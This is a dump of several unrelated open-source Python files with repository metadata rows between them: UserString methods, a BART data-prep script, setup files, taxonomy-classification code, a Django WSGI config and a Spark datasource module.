return self.__class__(other + self.data)
return self.__class__(str(other) + self.data)
def __mul__(self, n):
return self.__class__(self.data * n)
__rmul__ = __mul__
def __mod__(self, args):
return self.__class__(self.data % args)
def __rmod__(self, template):
return self.__class__(str(template) % self)
def __sizeof__(self):
return _sys.getsizeof(self.data)
# the following methods are defined in alphabetical order:
def capitalize(self):
return self.__class__(self.data.capitalize())
def casefold(self):
return self.__class__(self.data.casefold())
def center(self, width, *args):
return self.__class__(self.data.center(width, *args))
def count(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.count(sub, start, end)
def removeprefix(self, prefix, /):
if isinstance(prefix, UserString):
prefix = prefix.data
return self.__class__(self.data.removeprefix(prefix))
def removesuffix(self, suffix, /):
if isinstance(suffix, UserString):
suffix = suffix.data
return self.__class__(self.data.removesuffix(suffix))
def encode(self, encoding='utf-8', errors='strict'):
encoding = 'utf-8' if encoding is None else encoding
errors = 'strict' if errors is None else errors
return self.data.encode(encoding, errors)
def endswith(self, suffix, start=0, end=_sys.maxsize):
return self.data.endswith(suffix, start, end)
def expandtabs(self, tabsize=8):
return self.__class__(self.data.expandtabs(tabsize))
def find(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.find(sub, start, end)
def format(self, /, *args, **kwds):
return self.data.format(*args, **kwds)
def format_map(self, mapping):
return self.data.format_map(mapping)
def index(self, sub, start=0, end=_sys.maxsize):
return self.data.index(sub, start, end)
def isalpha(self):
return self.data.isalpha()
def isalnum(self):
return self.data.isalnum()
def isascii(self):
return self.data.isascii()
def isdecimal(self):
return self.data.isdecimal()
def isdigit(self):
return self.data.isdigit()
def isidentifier(self):
return self.data.isidentifier()
def islower(self):
return self.data.islower()
def isnumeric(self):
return self.data.isnumeric()
def isprintable(self):
return self.data.isprintable()
def isspace(self):
return self.data.isspace()
def istitle(self):
return self.data.istitle()
def isupper(self):
return self.data.isupper()
def join(self, seq):
return self.data.join(seq)
def ljust(self, width, *args):
return self.__class__(self.data.ljust(width, *args))
def lower(self):
return self.__class__(self.data.lower())
def lstrip(self, chars=None):
return self.__class__(self.data.lstrip(chars))
maketrans = str.maketrans
def partition(self, sep):
return self.data.partition(sep)
def replace(self, old, new, maxsplit=-1):
if isinstance(old, UserString):
old = old.data
if isinstance(new, UserString):
new = new.data
return self.__class__(self.data.replace(old, new, maxsplit))
def rfind(self, sub, start=0, end=_sys.maxsize):
if isinstance(sub, UserString):
sub = sub.data
return self.data.rfind(sub, start, end)
def rindex(self, sub, start=0, end=_sys.maxsize):
return self.data.rindex(sub, start, end)
def rjust(self, width, *args):
return self.__class__(self.data.rjust(width, *args))
def rpartition(self, sep):
return self.data.rpartition(sep)
def rstrip(self, chars=None):
return self.__class__(self.data.rstrip(chars))
def split(self, sep=None, maxsplit=-1):
return self.data.split(sep, maxsplit)
def rsplit(self, sep=None, maxsplit=-1):
return self.data.rsplit(sep, maxsplit)
def splitlines(self, keepends=False):
return self.data.splitlines(keepends)
def startswith(self, prefix, start=0, end=_sys.maxsize):
return self.data.startswith(prefix, start, end)
def strip(self, chars=None):
return self.__class__(self.data.strip(chars))
def swapcase(self):
return self.__class__(self.data.swapcase())
def title(self):
return self.__class__(self.data.title())
def translate(self, *args):
return self.__class__(self.data.translate(*args))
def upper(self):
return self.__class__(self.data.upper())
def zfill(self, width):
return self.__class__(self.data.zfill(width)) | 33.182973 | 99 | 0.577465 |
ace8dbb303b7f35de08ef0d1f0041f4c28e4ad58 | 748 | py | Python | baselines/BART/sprep.py | shahhaard47/Script-Generation | a9a5ebfedbfb40c2c023ed042c22a6523e38ed9b | [
"MIT"
] | 1 | 2021-09-02T21:57:09.000Z | 2021-09-02T21:57:09.000Z | baselines/BART/sprep.py | shahhaard47/Script-Generation | a9a5ebfedbfb40c2c023ed042c22a6523e38ed9b | [
"MIT"
] | 3 | 2021-02-02T22:50:13.000Z | 2022-03-12T00:36:27.000Z | baselines/BART/sprep.py | shahhaard47/Script-Generation | a9a5ebfedbfb40c2c023ed042c22a6523e38ed9b | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
def flines(f,l):
sz = len(l)
for i in range(sz-1):
f.write(l[i])
f.write('\n')
f.write(l[-1])
df = pd.read_csv("genre.csv")
f = open("train.source","w")
f2 = open("train.target","w")
f3 = open("val.source","w")
f4 = open("val.target","w")
for i in range(10):
dl = str(bytes(' '.join(df.loc[i,"script"].split()),'utf-8').decode('ascii','ignore').encode("ascii"))[1:].replace(r'\'','\'').split()
if(len(dl)<100):
continue
print(df.iloc[i,0])
dl2 = []
for i in range(0,len(dl),56):
dl2.append(' '.join(dl[i:i+56]))
lim = (len(dl2)*3)//4
flines(f,dl2[:lim-1])
flines(f2,dl2[1:lim])
flines(f3,dl2[lim:-1])
flines(f4,dl2[lim+1:]) | 26.714286 | 138 | 0.540107 |
ace8dc41927d431bcfb5885ac51316960817bec1 | 806 | py | Python | setup.py | snower/pyslock | 9f81cc890056496878ad4f19adb58754ee3f2401 | [
"MIT"
] | null | null | null | setup.py | snower/pyslock | 9f81cc890056496878ad4f19adb58754ee3f2401 | [
"MIT"
] | null | null | null | setup.py | snower/pyslock | 9f81cc890056496878ad4f19adb58754ee3f2401 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# 14-8-8
# create by: snower
import os
from setuptools import find_packages, setup
if os.path.exists("README.md"):
with open("README.md") as fp:
long_description = fp.read()
else:
long_description = 'https://github.com/snower/syncany'
setup(
name='pyslock',
version='0.0.1',
packages=find_packages(),
install_requires=[],
author='snower',
author_email='sujian199@gmail.com',
url='https://github.com/snower/pyslock',
license='MIT',
keywords=[
"shared lock", "slock"
],
package_data={
'': ['README.md'],
},
description='High-performance distributed shared lock service client driver',
long_description=long_description,
long_description_content_type='text/markdown',
zip_safe=False,
)
| 23.705882 | 81 | 0.650124 |
ace8de8bb489091a790de5ae1275c7fcc131120f | 8,725 | py | Python | CAT_pack/tax.py | diegocambuy/CAT | d77355050b9f4140ad864cc1789c22523481e3d3 | [
"MIT"
] | null | null | null | CAT_pack/tax.py | diegocambuy/CAT | d77355050b9f4140ad864cc1789c22523481e3d3 | [
"MIT"
] | 4 | 2016-09-06T11:55:09.000Z | 2016-11-11T01:31:10.000Z | CAT_pack/tax.py | diegocambuy/CAT | d77355050b9f4140ad864cc1789c22523481e3d3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
import shared
def import_nodes(nodes_dmp, log_file, quiet):
message = 'Loading file {0}.'.format(nodes_dmp)
shared.give_user_feedback(message, log_file, quiet)
taxid2parent = {}
taxid2rank = {}
with open(nodes_dmp, 'r') as f1:
for line in f1:
line = line.split('\t')
taxid = line[0]
parent = line[2]
rank = line[4]
taxid2parent[taxid] = parent
taxid2rank[taxid] = rank
return (taxid2parent, taxid2rank)
def import_names(names_dmp, log_file, quiet):
message = 'Loading file {0}.'.format(names_dmp)
shared.give_user_feedback(message, log_file, quiet)
taxid2name = {}
with open(names_dmp, 'r') as f1:
for line in f1:
line = line.split('\t')
if line[6] == 'scientific name':
taxid = line[0]
name = line[2]
taxid2name[taxid] = name
return taxid2name
def import_fastaid2LCAtaxid(fastaid2LCAtaxid_file, all_hits, log_file, quiet):
message = 'Loading file {0}.'.format(fastaid2LCAtaxid_file)
shared.give_user_feedback(message, log_file, quiet)
fastaid2LCAtaxid = {}
with open(fastaid2LCAtaxid_file, 'r') as f1:
for line in f1:
line = line.rstrip().split('\t')
if line[0] in all_hits:
# Only include fastaids that are found in hits.
fastaid2LCAtaxid[line[0]] = line[1]
return fastaid2LCAtaxid
def import_taxids_with_multiple_offspring(
taxids_with_multiple_offspring_file, log_file, quiet):
message = 'Loading file {0}.'.format(taxids_with_multiple_offspring_file)
shared.give_user_feedback(message, log_file, quiet)
taxids_with_multiple_offspring = set()
with open(taxids_with_multiple_offspring_file, 'r') as f1:
for line in f1:
line = line.rstrip()
taxids_with_multiple_offspring.add(line)
return taxids_with_multiple_offspring
def find_lineage(taxid, taxid2parent, lineage=None):
if lineage is None:
lineage = []
lineage.append(taxid)
if taxid2parent[taxid] == taxid:
return lineage
else:
return find_lineage(taxid2parent[taxid], taxid2parent, lineage)
def find_LCA(list_of_lineages):
overlap = set.intersection(*map(set, list_of_lineages))
for taxid in list_of_lineages[0]:
if taxid in overlap:
return taxid
def find_LCA_for_ORF(hits, fastaid2LCAtaxid, taxid2parent):
list_of_lineages = []
top_bitscore = 0
for (hit, bitscore) in hits:
if bitscore > top_bitscore:
top_bitscore = bitscore
try:
taxid = fastaid2LCAtaxid[hit]
lineage = find_lineage(taxid, taxid2parent)
list_of_lineages.append(lineage)
except:
# The fastaid does not have an associated taxid for some reason.
pass
if len(list_of_lineages) == 0:
return ('no taxid found ({0})'.format(';'.join([i[0] for i in hits])),
top_bitscore)
overlap = set.intersection(*map(set, list_of_lineages))
for taxid in list_of_lineages[0]:
if taxid in overlap:
return (taxid, top_bitscore)
def find_questionable_taxids(lineage, taxids_with_multiple_offspring):
questionable_taxids = []
if lineage == ['1'] or lineage == ['root']:
return questionable_taxids
if len(lineage) == 2 and (lineage[1:] == ['1'] or lineage[1:] == ['root']):
return questionable_taxids
for (i, taxid) in enumerate(lineage):
taxid_parent = lineage[i + 1]
if taxid_parent in taxids_with_multiple_offspring:
return questionable_taxids
questionable_taxids.append(taxid)
def star_lineage(lineage, taxids_with_multiple_offspring):
questionable_taxids = find_questionable_taxids(lineage,
taxids_with_multiple_offspring)
starred_lineage = [taxid if
taxid not in questionable_taxids else
'{0}*'.format(taxid) for taxid in lineage]
return starred_lineage
def find_weighted_LCA(LCAs_ORFs, taxid2parent, f):
list_of_lineages = []
list_of_bitscores = []
based_on_n_ORFs = 0
for (taxid, top_bitscore) in LCAs_ORFs:
if taxid.startswith('no taxid found'):
# Thus the ORFs that are not classified because they don't have an
# associated taxid are not taken into account for the
# classification of the contig.
continue
lineage = find_lineage(taxid, taxid2parent)
list_of_lineages.append(lineage)
list_of_bitscores.append(top_bitscore)
based_on_n_ORFs += 1
if len(list_of_lineages) == 0:
return (
'no ORFs with taxids found.',
'no ORFs with taxids found.',
'no ORFs with taxids found.')
taxid2bitscore = {}
for (i, lineage) in enumerate(list_of_lineages):
for taxid in lineage:
if taxid not in taxid2bitscore:
taxid2bitscore[taxid] = 0
taxid2bitscore[taxid] += list_of_bitscores[i]
whitelisted_lineages = []
for taxid in taxid2bitscore:
if taxid2bitscore[taxid] / sum(list_of_bitscores) > f:
lineage = find_lineage(taxid, taxid2parent)
whitelisted_lineages.append(lineage)
if len(whitelisted_lineages) == 0:
return (
'no lineage whitelisted.',
'no lineage whitelisted.',
'no lineage whitelisted.')
whitelisted_lineages = sorted(whitelisted_lineages,
key=lambda x: len(x), reverse=True)
longest_lineages = []
longest_lineages_scores = []
taxid_trace = set()
for whitelisted_lineage in whitelisted_lineages:
if whitelisted_lineage[0] not in taxid_trace:
longest_lineages.append(whitelisted_lineage)
scores = [taxid2bitscore[taxid] / sum(list_of_bitscores) for
taxid in whitelisted_lineage]
longest_lineages_scores.append(scores)
taxid_trace |= set(whitelisted_lineage)
return (longest_lineages, longest_lineages_scores, based_on_n_ORFs)
def convert_to_names(lineage, taxid2rank, taxid2name, scores=None):
names = []
for (i, taxid) in enumerate(lineage):
if '*' in taxid:
taxid = taxid.rstrip('*')
starred = True
else:
starred = False
name = taxid2name[taxid]
rank = taxid2rank[taxid]
if scores is not None:
if starred:
names.append('{0}* ({1}): {2}'.format(name, rank, scores[i]))
else:
names.append('{0} ({1}): {2}'.format(name, rank, scores[i]))
else:
if starred:
names.append('{0}* ({1})'.format(name, rank))
else:
names.append('{0} ({1})'.format(name, rank))
return names
def convert_to_official_names(lineage, taxid2rank, taxid2name, scores=None):
official_ranks = ['superkingdom', 'phylum', 'class', 'order', 'family',
'genus', 'species']
lineage_ranks = [taxid2rank[taxid.rstrip('*')] for taxid in lineage]
official_names = ['no support'] * 7
for (i, rank) in enumerate(official_ranks):
if rank in lineage_ranks:
index = lineage_ranks.index(rank)
taxid = lineage[index]
if '*' in taxid:
taxid = taxid.rstrip('*')
starred = True
else:
starred = False
name = taxid2name[taxid]
if scores is not None:
if starred:
official_names[i] = '{0}*: {1}'.format(name, scores[index])
else:
official_names[i] = '{0}: {1}'.format(name, scores[index])
else:
if starred:
official_names[i] = '{0}*'.format(name)
else:
official_names[i] = name
# Fill the official lineage with NAs if a lower classification is present.
index_lowest_classification = 0
for (i, name) in enumerate(official_names):
if name != 'no support':
index_lowest_classification = i
for i in range(index_lowest_classification):
if official_names[i] == 'no support':
official_names[i] = 'NA'
return official_names
if __name__ == '__main__':
sys.exit('Run \'CAT\' to run CAT or BAT.')
| 29.377104 | 82 | 0.594155 |
ace8df01dc96fae187634aad51209a07002c0ec1 | 3,757 | py | Python | speedy/setup.py | ashrafizahra81/CodART | 693e59d568b548edb2539d04cff1fd991de43124 | [
"MIT"
] | 1 | 2022-02-04T11:09:08.000Z | 2022-02-04T11:09:08.000Z | speedy/setup.py | ashrafizahra81/CodART | 693e59d568b548edb2539d04cff1fd991de43124 | [
"MIT"
] | null | null | null | speedy/setup.py | ashrafizahra81/CodART | 693e59d568b548edb2539d04cff1fd991de43124 | [
"MIT"
] | null | null | null | """
`java8speedy` module setup
Adding support for Java 8 labeled grammar
"""
__version__ = '0.5.0'
__author__ = 'Morteza'
import sys
import os
import platform
import fnmatch
import setuptools
target = platform.system().lower()
PLATFORMS = {'windows', 'linux', 'darwin', 'cygwin'}
for known in PLATFORMS:
if target.startswith(known):
target = known
def run_setup(with_binary):
if with_binary:
extra_compile_args = {
'windows': ['/DANTLR4CPP_STATIC', '/Zc:__cplusplus'],
'linux': ['-std=c++11'],
'darwin': ['-std=c++11'],
'cygwin': ['-std=c++11'],
}
# Define an Extension object that describes the Antlr accelerator
parser_ext = setuptools.Extension(
# Extension name shall be at the same level as the sa_java8_parser.py module
name='java8speedy.parser.sa_javalabeled_cpp_parser',
# Add the Antlr runtime source directory to the include search path
include_dirs=["src/java8speedy/parser/cpp_src/antlr4_cpp_runtime"],
# Rather than listing each C++ file (Antlr has a lot!), discover them automatically
sources=get_files("src/java8speedy/parser/cpp_src", "*.cpp"),
depends=get_files("src/java8speedy/parser/cpp_src", "*.h"),
extra_compile_args=extra_compile_args.get(target, [])
)
ext_modules = [parser_ext]
else:
ext_modules = []
# Define a package
setuptools.setup(
name='java8speedy',
version='1.2.0',
description='Java Speedup Parser',
packages=setuptools.find_packages("src"),
package_dir={"": "src"},
include_package_data=True,
install_requires=[
"antlr4-python3-runtime >= 4.9.2",
],
ext_modules=ext_modules,
cmdclass={"build_ext": ve_build_ext},
)
# ===============================================================================
from setuptools.command.build_ext import build_ext
from distutils.errors import CCompilerError, DistutilsExecError, DistutilsPlatformError
def get_files(path, pattern):
"""
Recursive file search that is compatible with python3.4 and older
"""
matches = []
for root, _, filenames in os.walk(path):
for filename in fnmatch.filter(filenames, pattern):
matches.append(os.path.join(root, filename))
return matches
class BuildFailed(Exception):
pass
class ve_build_ext(build_ext):
"""
This class extends setuptools to fail with a common BuildFailed exception
if a build fails
"""
def run(self):
try:
build_ext.run(self)
except DistutilsPlatformError:
raise BuildFailed()
def build_extension(self, ext):
try:
build_ext.build_extension(self, ext)
except (CCompilerError, DistutilsExecError, DistutilsPlatformError):
raise BuildFailed()
except ValueError:
# this can happen on Windows 64 bit, see Python issue 7511
if "'path'" in str(sys.exc_info()[1]): # works with Python 2 and 3
raise BuildFailed()
raise
# Detect if an alternate interpreter is being used
is_jython = "java" in sys.platform
is_pypy = hasattr(sys, "pypy_version_info")
# Force using fallback if using an alternate interpreter
using_fallback = is_jython or is_pypy
if not using_fallback:
try:
run_setup(with_binary=True)
except BuildFailed:
if 'SPAM_EXAMPLE_REQUIRE_CI_BINARY_BUILD' in os.environ:
# Require build to pass if running in travis-ci
raise
else:
using_fallback = True
if using_fallback:
run_setup(with_binary=False)
| 28.9 | 95 | 0.627096 |
ace8df29b93364ee4ac1b404be6a9188d5a201f3 | 966 | py | Python | rkpylib/backups/rkhttp_globals.py | rafaank/rkpylib | 9081044fd535bc8792df54a16611c835592a4343 | [
"Apache-2.0"
] | null | null | null | rkpylib/backups/rkhttp_globals.py | rafaank/rkpylib | 9081044fd535bc8792df54a16611c835592a4343 | [
"Apache-2.0"
] | null | null | null | rkpylib/backups/rkhttp_globals.py | rafaank/rkpylib | 9081044fd535bc8792df54a16611c835592a4343 | [
"Apache-2.0"
] | 1 | 2019-04-29T10:29:51.000Z | 2019-04-29T10:29:51.000Z | from .rkdatasource import RKDataSource
from .rkutils import RKDict
from threading import Lock
def __init_globals__(globals):
globals.register('counter', 0)
dspool = list()
dspool_lock = list()
for i in range(5):
ds = RKDataSource(server='127.0.0.1', port=27017, database='test')
lck = Lock()
dspool.append(ds)
dspool_lock.append(lck)
globals.register('dspool', dspool)
globals.register('dspool_lock', dspool_lock)
globals.register('dspool_func', dspool_func)
globals.register('total_requests', 0)
def dspool_func(pool, pool_lock):
for idx, ds in enumerate(pool):
if pool_lock[idx].acquire(False):
print(f"Found dspool_item at index {idx}")
ds_obj = dict()
ds_obj['lock'] = pool_lock[idx]
ds_obj['ds'] = ds
return ds_obj
else:
continue
return None
| 26.833333 | 75 | 0.589027 |
ace8df2ea42d82eb80755688a3c2f0e138661e1e | 1,685 | py | Python | config/wsgi.py | Tlazypanda/outpass | bd52b8b91880471965b997fb4f494c0ad1aa2f20 | [
"MIT"
] | null | null | null | config/wsgi.py | Tlazypanda/outpass | bd52b8b91880471965b997fb4f494c0ad1aa2f20 | [
"MIT"
] | null | null | null | config/wsgi.py | Tlazypanda/outpass | bd52b8b91880471965b997fb4f494c0ad1aa2f20 | [
"MIT"
] | null | null | null | """
WSGI config for outpass project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
import sys
from django.core.wsgi import get_wsgi_application
# This allows easy placement of apps within the interior
# outpass directory.
app_path = os.path.abspath(os.path.join(
os.path.dirname(os.path.abspath(__file__)), os.pardir))
sys.path.append(os.path.join(app_path, 'outpass'))
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "config.settings.production"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.production")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| 41.097561 | 79 | 0.796439 |
ace8df5b2e10fc1964ba39af2e08e48c532e237a | 286 | py | Python | src/Javinizer/cfscraper.py | Anytinz/Javinizer | 64420c6ca0ca35faa62ccc5df8b647506dbca1b7 | [
"MIT"
] | null | null | null | src/Javinizer/cfscraper.py | Anytinz/Javinizer | 64420c6ca0ca35faa62ccc5df8b647506dbca1b7 | [
"MIT"
] | null | null | null | src/Javinizer/cfscraper.py | Anytinz/Javinizer | 64420c6ca0ca35faa62ccc5df8b647506dbca1b7 | [
"MIT"
] | null | null | null | import cloudscraper
import sys
cookie_value, user_agent = cloudscraper.get_cookie_string(
sys.argv[1], browser={'browser': 'chrome', 'mobile': False})
#cookie_value, user_agent = cloudscraper.get_cookie_string(sys.argv[1])
print('{}\n{}'.format(cookie_value, user_agent))
| 31.777778 | 72 | 0.734266 |
ace8e07bb71aa8492ac0d369acebc5aa1c2a8aca | 7,690 | py | Python | great_expectations/datasource/sparkdf_datasource.py | louispotok/great_expectations | b91a3ce10f771742f49ccad9c403bda03f318515 | [
"Apache-2.0"
] | null | null | null | great_expectations/datasource/sparkdf_datasource.py | louispotok/great_expectations | b91a3ce10f771742f49ccad9c403bda03f318515 | [
"Apache-2.0"
] | null | null | null | great_expectations/datasource/sparkdf_datasource.py | louispotok/great_expectations | b91a3ce10f771742f49ccad9c403bda03f318515 | [
"Apache-2.0"
] | null | null | null | import logging
import time
from six import string_types
from ..exceptions import BatchKwargsError
from .datasource import Datasource, ReaderMethods
from great_expectations.datasource.generator.subdir_reader_generator import SubdirReaderGenerator
from great_expectations.datasource.generator.databricks_generator import DatabricksTableGenerator
from great_expectations.datasource.generator.in_memory_generator import InMemoryGenerator
from great_expectations.datasource.generator.s3_generator import S3Generator
from great_expectations.types import ClassConfig
logger = logging.getLogger(__name__)
try:
from great_expectations.dataset.sparkdf_dataset import SparkDFDataset
from pyspark.sql import SparkSession, DataFrame
except ImportError:
SparkSession = None
# TODO: review logging more detail here
logger.debug("Unable to load pyspark; install optional spark dependency for support.")
class SparkDFDatasource(Datasource):
"""The SparkDFDatasource produces SparkDFDatasets and supports generators capable of interacting with local
filesystem (the default subdir_reader generator) and databricks notebooks.
"""
@classmethod
def build_configuration(cls, data_asset_type=None, generators=None, **kwargs):
"""
Build a full configuration object for a datasource, potentially including generators with defaults.
Args:
data_asset_type: A ClassConfig dictionary
generators: Generator configuration dictionary
**kwargs: Additional kwargs to be part of the datasource constructor's initialization
Returns:
A complete datasource configuration.
"""
if generators is None:
# Provide a gentle way to build a datasource with a sane default,
# including ability to specify the base_directory
base_directory = kwargs.pop("base_directory", "/data")
reader_options = kwargs.pop("reader_options", {})
generators = {
"default": {
"class_name": "SubdirReaderGenerator",
"base_directory": base_directory,
"reader_options": reader_options
}
}
if data_asset_type is None:
data_asset_type = ClassConfig(
class_name="SparkDFDataset"
)
else:
try:
data_asset_type = ClassConfig(**data_asset_type)
except TypeError:
# In this case, we allow the passed config, for now, in case they're using a legacy string-only config
pass
configuration = kwargs
configuration.update({
"data_asset_type": data_asset_type,
"generators": generators,
})
return configuration
def __init__(self, name="default", data_context=None, data_asset_type=None, generators=None, **kwargs):
configuration_with_defaults = SparkDFDatasource.build_configuration(data_asset_type, generators, **kwargs)
data_asset_type = configuration_with_defaults.pop("data_asset_type")
generators = configuration_with_defaults.pop("generators")
super(SparkDFDatasource, self).__init__(
name,
data_context=data_context,
data_asset_type=data_asset_type,
generators=generators,
**configuration_with_defaults)
try:
self.spark = SparkSession.builder.getOrCreate()
except AttributeError:
logger.error("Unable to load spark context; install optional spark dependency for support.")
self.spark = None
self._build_generators()
def _get_generator_class_from_type(self, type_):
if type_ == "subdir_reader":
return SubdirReaderGenerator
elif type_ == "databricks":
return DatabricksTableGenerator
elif type_ == "memory":
return InMemoryGenerator
elif type_ == "s3":
return S3Generator
else:
raise ValueError("Unrecognized BatchGenerator type %s" % type_)
def _get_data_asset(self, batch_kwargs, expectation_suite, caching=True, **kwargs):
"""class-private implementation of get_data_asset"""
if self.spark is None:
logger.error("No spark session available")
return None
batch_kwargs.update(kwargs)
reader_options = batch_kwargs.copy()
if "data_asset_type" in reader_options:
data_asset_type_config = reader_options.pop("data_asset_type") # Get and remove the config
try:
data_asset_type_config = ClassConfig(**data_asset_type_config)
except TypeError:
# We tried; we'll pass the config downstream, probably as a string, and handle an error later
pass
else:
data_asset_type_config = self._data_asset_type
data_asset_type = self._get_data_asset_class(data_asset_type_config)
if not issubclass(data_asset_type, SparkDFDataset):
raise ValueError("SparkDFDatasource cannot instantiate batch with data_asset_type: '%s'. It "
"must be a subclass of SparkDFDataset." % data_asset_type.__name__)
if "path" in batch_kwargs or "s3" in batch_kwargs:
if "path" in batch_kwargs:
path = reader_options.pop("path") # We remove this so it is not used as a reader option
else:
path = reader_options.pop("s3")
reader_options.pop("timestamp", "") # ditto timestamp (but missing ok)
reader_method = reader_options.pop("reader_method", None)
if reader_method is None:
reader_method = self._guess_reader_method_from_path(path)
if reader_method is None:
raise BatchKwargsError("Unable to determine reader for path: %s" % path, batch_kwargs)
else:
try:
reader_method = ReaderMethods[reader_method]
except KeyError:
raise BatchKwargsError("Unknown reader method: %s" % reader_method, batch_kwargs)
reader = self.spark.read
for option in reader_options.items():
reader = reader.option(*option)
if reader_method == ReaderMethods.CSV:
df = reader.csv(path)
elif reader_method == ReaderMethods.parquet:
df = reader.parquet(path)
elif reader_method == ReaderMethods.delta:
df = reader.format("delta").load(path)
else:
raise BatchKwargsError("Unsupported reader: %s" % reader_method.name, batch_kwargs)
elif "query" in batch_kwargs:
df = self.spark.sql(batch_kwargs["query"])
elif "dataset" in batch_kwargs and isinstance(batch_kwargs["dataset"], (DataFrame, SparkDFDataset)):
df = batch_kwargs.pop("dataset") # We don't want to store the actual DataFrame in kwargs
if isinstance(df, SparkDFDataset):
# Grab just the spark_df reference, since we want to override everything else
df = df.spark_df
batch_kwargs["SparkDFRef"] = True
else:
raise BatchKwargsError("Unrecognized batch_kwargs for spark_source", batch_kwargs)
return data_asset_type(df,
expectation_suite=expectation_suite,
data_context=self._data_context,
batch_kwargs=batch_kwargs,
caching=caching)
| 42.960894 | 118 | 0.641222 |
ace8e0a9cf61d866682b5a15c09cdce97c87cb8e | 475 | py | Python | Python/21 - 104 - validando entrada de dados em python.py | matheusguerreiro/python | f39a1b92409f11cbe7fef5d9261f863f9e0fac0d | [
"MIT"
] | null | null | null | Python/21 - 104 - validando entrada de dados em python.py | matheusguerreiro/python | f39a1b92409f11cbe7fef5d9261f863f9e0fac0d | [
"MIT"
] | null | null | null | Python/21 - 104 - validando entrada de dados em python.py | matheusguerreiro/python | f39a1b92409f11cbe7fef5d9261f863f9e0fac0d | [
"MIT"
] | null | null | null | # Aula 21 (Funรงรตes (Parte 2))
def leiaInt(msg):
ok = False
valor = 0
while True:
n = str(input(msg))
if n.isnumeric():
valor = int(n)
ok = True
else:
print(f'\033[1;31mErro! Digite um nรบmero inteiro.\033[m')
if ok == True:
break
return valor
print('Validaรงรฃo de Dados')
numero = leiaInt('Digite um Nรบmero: ')
print(f'\033[1;32mVocรช acabou de digitar o nรบmero {numero}.\033[m') | 23.75 | 69 | 0.547368 |
ace8e12ff8bf60b4eff34031261469d302a0cd09 | 326 | py | Python | users/views.py | Shubarin/api_booking | 2340a022843410a882ff1e9434d5a21601be42a2 | [
"BSD-3-Clause"
] | null | null | null | users/views.py | Shubarin/api_booking | 2340a022843410a882ff1e9434d5a21601be42a2 | [
"BSD-3-Clause"
] | null | null | null | users/views.py | Shubarin/api_booking | 2340a022843410a882ff1e9434d5a21601be42a2 | [
"BSD-3-Clause"
] | null | null | null | from django.shortcuts import render
from django.urls import reverse_lazy
from django.views.generic import CreateView
from .forms import CreationForm
class SignUp(CreateView):
form_class = CreationForm
success_url = reverse_lazy("login") # ะณะดะต login โ ััะพ ะฟะฐัะฐะผะตัั "name" ะฒ path()
template_name = "signup.html"
| 27.166667 | 83 | 0.766871 |
ace8e298717059a1cc2600ae30b349d57e78fb72 | 60 | py | Python | selectable_select2/base.py | pablochud/django-selectable-select2 | 5561d9eaf48a56e3f1b74466cc6c4fe82ced07d1 | [
"BSD-3-Clause"
] | null | null | null | selectable_select2/base.py | pablochud/django-selectable-select2 | 5561d9eaf48a56e3f1b74466cc6c4fe82ced07d1 | [
"BSD-3-Clause"
] | null | null | null | selectable_select2/base.py | pablochud/django-selectable-select2 | 5561d9eaf48a56e3f1b74466cc6c4fe82ced07d1 | [
"BSD-3-Clause"
] | null | null | null | from selectable.base import LookupBase, ModelLookup # noqa
| 30 | 59 | 0.816667 |
ace8e4bd05c05282d660096396f00952214f29be | 678 | py | Python | tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial3_Solution_1d165229.py | liuxiaomiao123/NeuroMathAcademy | 16a7969604a300bf9fbb86f8a5b26050ebd14c65 | [
"CC-BY-4.0"
] | 2 | 2020-07-03T04:39:09.000Z | 2020-07-12T02:08:31.000Z | tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial3_Solution_1d165229.py | NinaHKivanani/course-content | 3c91dd1a669cebce892486ba4f8086b1ef2e1e49 | [
"CC-BY-4.0"
] | 1 | 2020-06-22T22:57:03.000Z | 2020-06-22T22:57:03.000Z | tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial3_Solution_1d165229.py | NinaHKivanani/course-content | 3c91dd1a669cebce892486ba4f8086b1ef2e1e49 | [
"CC-BY-4.0"
] | 1 | 2022-01-23T20:16:15.000Z | 2022-01-23T20:16:15.000Z | def correlate_rdms(rdm1, rdm2):
"""Correlate off-diagonal elements of two RDM's
Args:
rdm1 (np.ndarray): S x S representational dissimilarity matrix
rdm2 (np.ndarray): S x S representational dissimilarity matrix to
correlate with rdm1
Returns:
float: correlation coefficient between the off-diagonal elements
of rdm1 and rdm2
"""
# Extract off-diagonal elements of each RDM
ioffdiag = np.triu_indices(rdm1.shape[0], k=1) # indices of off-diagonal elements
rdm1_offdiag = rdm1[ioffdiag]
rdm2_offdiag = rdm2[ioffdiag]
# Compute correlation coefficient
return zscore(rdm1_offdiag) @ zscore(rdm2_offdiag) / len(rdm2_offdiag) | 32.285714 | 84 | 0.728614 |
ace8e6837c6387950b17bcb0b39bb475481a0376 | 7,982 | py | Python | util/useremails.py | bcaton85/quay | a60d0c9248e2a8ee159bcf9c6bd6efcebf2e9d6e | [
"Apache-2.0"
] | null | null | null | util/useremails.py | bcaton85/quay | a60d0c9248e2a8ee159bcf9c6bd6efcebf2e9d6e | [
"Apache-2.0"
] | null | null | null | util/useremails.py | bcaton85/quay | a60d0c9248e2a8ee159bcf9c6bd6efcebf2e9d6e | [
"Apache-2.0"
] | null | null | null | import os
import json
import logging
import features
from unittest import mock
from flask_mail import Message
